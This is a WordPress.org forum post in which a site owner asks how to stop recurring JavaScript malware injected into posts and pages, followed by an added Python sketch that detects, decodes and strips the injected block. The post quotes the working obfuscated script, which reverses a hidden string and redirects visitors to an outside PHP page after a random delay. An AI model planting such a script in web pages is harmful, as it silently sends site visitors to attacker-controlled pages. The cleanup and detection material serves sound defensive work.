Channel: Topic Tag: malware | WordPress.org

Can’t get rid of recurring JavaScript malware


Hi,

I have a site running WordPress 6.1.1 that has a recurring problem with JavaScript malware getting injected into the body of posts and pages. The malware is a simple script that looks like this:

<script>$mWn=function(n){if(typeof ($mWn.list[n])==\"string\") return $mWn.list[n].split(\"\").reverse().join(\"\");return $mWn.list[n];};$mWn.list=[\"\\\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>

The domain being used will vary each time it shows up. Thousands of copies will get added to the pages and posts. I can remove the scripts easily enough by dumping the database, using sed to remove all copies, then re-importing the database, but after a week or two it will suddenly show up again. I’ve updated everything to the latest version, disabled some older plugins, and changed all the admin users’ passwords, but that hasn’t helped. How do I figure out how this is getting added to the site and stop it from happening again? Thanks.
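
An added example, not part of the original post: a Python sketch that recognizes the injected block by its structure rather than by domain (the post notes the domain varies), decodes the reversed string to report where it redirects, and strips the block from a post body. The function names, the sample rows and the host `redirect.example` are constructed for illustration.

```python
import re

# Shape of the block quoted in the post:
#   <script>$X=function(n){...};$X.list=["<reversed JS>"];...</script>
# Keyed on structure, not on the domain, because the domain changes per wave.
INJECTED = re.compile(
    r"<script>\s*(\$\w+)=function\(n\)\{.*?\1\.list=\[(.*?)\];.*?</script>",
    re.DOTALL)
STRING = re.compile(r'"(.*?)"')
HOST = re.compile(r"""https?://([^/'"\s]+)""")

def scan(content):
    """Return (cleaned, decoded_payloads, hosts) for one post body."""
    payloads, hosts = [], []
    def strip(match):
        # Backslashes (raw \' or dump-escaped \" and \\\') only hide quotes.
        body = match.group(2).replace("\\", "")
        for literal in STRING.findall(body):
            decoded = literal[::-1]  # same as split("").reverse().join("")
            payloads.append(decoded)
            hosts.extend(HOST.findall(decoded))
        return ""
    return INJECTED.sub(strip, content), payloads, hosts

def report(rows):
    """rows: (post_id, post_content) pairs -> {post_id: (copies, hosts)}."""
    hits = {}
    for post_id, content in rows:
        _, payloads, hosts = scan(content)
        if payloads:
            hits[post_id] = (len(payloads), sorted(set(hosts)))
    return hits

# Constructed sample: placeholder host, same wrapper as the quoted script.
PAYLOAD = "document.location.href='https://redirect.example/r.php'"
INJECTION = (
    '<script>$aB=function(n){if(typeof ($aB.list[n])=="string") '
    'return $aB.list[n].split("").reverse().join("");return $aB.list[n];};'
    '$aB.list=["' + PAYLOAD[::-1].replace("'", "\\'") + '"];'
    'var number1=Math.floor(Math.random()*6); if (number1==3)'
    '{var delay = 18000;setTimeout($aB(0),delay);}</script>')
SAMPLE_ROWS = [(101, "<p>Intro</p>" + INJECTION + "<p>Body</p>" + INJECTION),
               (102, "<p>Clean post</p><script>var ok=1;</script>")]

if __name__ == "__main__":
    for post_id, (copies, hosts) in report(SAMPLE_ROWS).items():
        print(post_id, copies, hosts)
```

Run over `post_content` values from `wp_posts` (raw or taken from a dump), the per-post counts and decoded hosts give a record of each wave that can be compared against access logs for the time the injection reappeared.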

